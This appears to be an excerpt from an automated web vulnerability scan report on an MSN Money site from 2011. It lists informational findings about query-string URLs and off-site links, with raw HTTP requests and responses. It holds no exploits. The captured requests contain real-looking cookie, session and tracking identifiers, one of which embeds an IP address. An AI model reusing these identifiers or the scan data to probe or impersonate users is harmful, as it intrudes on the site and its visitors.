<p><img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" /> now how can someone who is so right about the best personal armament (SA XD) not understand that we have in place a social democracy and that hitler and stalin were very far from either "socialis
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XnsEzD802_f4COcAl2sMs2OXQ38e5NBT6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XIuRaXU6OdMGt1DPaz47_ilsrPj8q2cj4?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X19kLPwdz5sB2Fnf9yuXWOdr9kOtEAGL6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xnro6l_39mWfG4y1hE7LEgx_WqLpHdupL?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhfDJa04FoRujoDJi4C1LEoyMkBUSqiKS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xj0dHfUYtwaLtz5YCWnr-VnjhGC9rBkYC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Someone
..(jewcanu)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
;has a nice job. He never really commits to an answer and is much like a weatherman. Guess at the forecast as if they are wrong no one really cares. I guess that&#39;s why they call it forecasting.<img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.204. http://money.redacted/mutual-fund/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/mutual-fund/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/mutual-fund/default-dyn.aspx?cp-documentid=6783739

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406253&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmutual-fund%2Fdefault-dyn.aspx%3Fcp-documentid%3D6783739&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&resize=false

Request

GET /mutual-fund/default-dyn.aspx?cp-documentid=6783739 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=368dfbb5f8aa44c7b714267f78d6c7a0; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:50:53 GMT
Content-Length: 61323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406253&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmutual-fund%2Fdefault-dyn.aspx%3Fcp-documentid%3D6783739&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&resize=false" class="opennew">Please tell us what you think</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.205. http://money.redacted/mutual-fund/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/mutual-fund/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/mutual-fund/default-dyn.aspx?cp-documentid=6783739

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353380&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmutual-fund%2Fdefault-dyn.aspx%3Fcp-documentid%3D6783739&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&resize=false

Request

GET /mutual-fund/default-dyn.aspx?cp-documentid=6783739 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

22.206. http://money.redacted/mutual-fund/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/mutual-fund/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/mutual-fund/default-dyn.aspx?cp-documentid=6783739

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344879&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmutual-fund%2Fdefault-dyn.aspx%3Fcp-documentid%3D6783739&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&resize=false

Request

GET /mutual-fund/default-dyn.aspx?cp-documentid=6783739 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=c17fb51b2148461c84e7aa6afbc979cb; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:59 GMT
Content-Length: 61323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344879&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmutual-fund%2Fdefault-dyn.aspx%3Fcp-documentid%3D6783739&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&resize=false" class="opennew">Please tell us what you think</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.207. http://money.redacted/mutual-fund/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/mutual-fund/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/mutual-fund/default-dyn.aspx?cp-documentid=6783739

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410099&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmutual-fund%2Fdefault-dyn.aspx%3Fcp-documentid%3D6783739&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=RRPLwyWA&resize=false

Request

Response

22.208. http://money.redacted/saving-money/50-30-20-budget.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/saving-money/50-30-20-budget.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/saving-money/50-30-20-budget.aspx?GT1=33001

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://amch.questionmarket.com/adsc/d853029/9/859689/randm.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://learn.bankofamerica.com/
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=How+can+i+budget+to+save&go=&form=money3
http://www.bing.com/search?q=How+much+annual+pay+should+I+be+saving&form=money3
http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&form=money3
http://www.bing.com/search?q=Should+an+adult+have+an+allowance&form=money3
http://www.bing.com/search?q=What+is+the+difference+between+a+credit+union+and+a+bank&form=money3
http://www.bing.com/search?q=What+is+the+secret+to+saving+money&form=money3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410169&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fsaving-money%2F50-30-20-budget.aspx%3FGT1%3D33001&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

GET /saving-money/50-30-20-budget.aspx?GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

22.209. http://money.redacted/saving-money/50-30-20-budget.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/saving-money/50-30-20-budget.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/saving-money/50-30-20-budget.aspx?GT1=33001

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://amch.questionmarket.com/adsc/d853029/9/859689/randm.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://learn.bankofamerica.com/
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=How+can+i+budget+to+save&go=&form=money3
http://www.bing.com/search?q=How+much+annual+pay+should+I+be+saving&form=money3
http://www.bing.com/search?q=I+want+to+retire+at+50+how+much+money+do+I+need&form=money3
http://www.bing.com/search?q=Should+an+adult+have+an+allowance&form=money3
http://www.bing.com/search?q=What+is+the+difference+between+a+credit+union+and+a+bank&form=money3
http://www.bing.com/search?q=What+is+the+secret+to+saving+money&form=money3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353389&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fsaving-money%2F50-30-20-budget.aspx%3FGT1%3D33001&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

22.210. http://money.redacted/saving-money/50-30-20-budget.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/saving-money/50-30-20-budget.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/saving-money/50-30-20-budget.aspx?GT1=33001

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://amch.questionmarket.com/adsc/d853029/9/859689/randm.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://learn.bankofamerica.com/
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
